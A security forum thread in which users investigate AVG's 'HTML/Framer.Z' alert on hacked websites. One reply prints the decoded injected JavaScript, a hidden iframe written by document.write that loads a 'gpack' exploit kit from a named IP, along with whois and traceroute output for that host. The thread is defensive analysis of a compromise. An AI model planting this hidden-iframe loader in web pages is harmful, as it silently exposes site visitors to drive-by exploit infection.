Sarah
Premium,ExMod 2002-05
join:2001-01-09
Cambridge, MA
clubs:
| Question about HTML/Framer.Z
A website I frequent has been sending up flags that AVG has found "HTML/Framer.Z" upon loading the main web page. Talking to some other forum members (via e-mail since the forum is down now) it seems that everyone running AVG has seen this but someone running Norton finds nothing. No one seems to be seeing any kind of active infection; AVG is just flagging the cached pages from the infected site. After a full scan it did not find any other infected files.
I can find very little information about this particular problem and I'm wondering if anyone here can enlighten me? Should my friend with Norton be worried or is this something along the lines of a FP/overreaction with AVG? I'm thinking this may be a more common virus that AVG is just naming differently than everyone else but I don't know what exactly I need to be looking for. Google searches just reveal questions like mine ("I'm seeing this pop up, what should I do") and no real info about the virus in question.
--
Killers and liars welcome |
|
redwolfe_98
join:2001-06-11 | i have seen times when "antivir" would flag some webpages just because someone had posted some "code" in one of the posts.. maybe avg is, similarly, flagging something like that? |
|
Sarah
Premium,ExMod 2002-05
join:2001-01-09
Cambridge, MA
clubs:
| It was flagging the page with the forum list on it (basically its version of this page: »/forums/all) which is also the main page of the forum... so I don't think it could be anything that was posted by a user.
I should add, if it matters, the page looked like it had been altered since there were error messages in it and people could not log in...
--
Killers and liars welcome |
|
zteardrop
join:2005-12-20
Brooklyn, NY | FYI.. only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it. Its hard to say if its an FP without the URL. If you can PM me the URL I can take a look. |
|
Sarah
Premium,ExMod 2002-05
join:2001-01-09
Cambridge, MA
clubs:
| The page is gone now so there's nothing left to look at... he just tacked up a placeholder message saying it will be back up soon when he fixes it.
But that is good info re: Norton, I know my friend was using a recent version of Firefox so it's probably less likely to be vulnerable.
--
Killers and liars welcome |
|
Zendiver
@ictxwavemedia.net
1 edit | reply to Sarah
I have been on vacation and just found out that my site is starting to do this as well.
[link removed] |
|
sashwa
Pixie Cat Crunchin' n Foldin'
Premium,Mod
join:2001-01-29
Alcatraz
clubs: | reply to Sarah
Do not click the above link. |
|
DocHoliday
@qwest.net | reply to zteardrop
I get the same virus notice from my AVG. I googled Tiger Jimmy tattoos. When at the site, i got the same message 3 times. AVG said it healed the virus. It did come up after running AVG. |
|
bobince
join:2002-04-19
DE
| reply to zteardrop
quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it
Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.
Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).
So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:
{script}eval(unescape("%77%69%6e%64%6f%77%2e...
Code like this is an immediate big red flag.
Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times. |
|
mpw101
@cableone.net | reply to zteardrop
AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com. |
|
foxsteve
Premium
join:2001-12-28
Campbell, CA
4 edits | Re: Question about HTML/Framer.Z
That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here
window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>')
Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name.
Additional information.
This IP is allocated to APNIC (Asia Pacific Network Information Centre)
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: Internet Service Provider
status: ALLOCATED PORTABLE
person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php
PS. For bobince 
As you see that server is located in Hong-Kong and it is not Russia. :) |
|
bobince
join:2002-04-19
DE
| quote:
As you see that server is located in Hong-Kong and it is not Russia
True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK.
HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell. |
|
foxsteve
Premium
join:2001-12-28
Campbell, CA
1 edit | If this is information from Piu Lo 
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
....
>tracert 58.65.232.33
Tracing route to oracle.dmain.name [58.65.232.33]
over a maximum of 30 hops:
...............
8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146]
9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93]
10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210]
11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90]
12 187 ms 186 ms 187 ms 58.65.235.230
13 186 ms 187 ms 187 ms 116.50.12.10
14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33] |
|
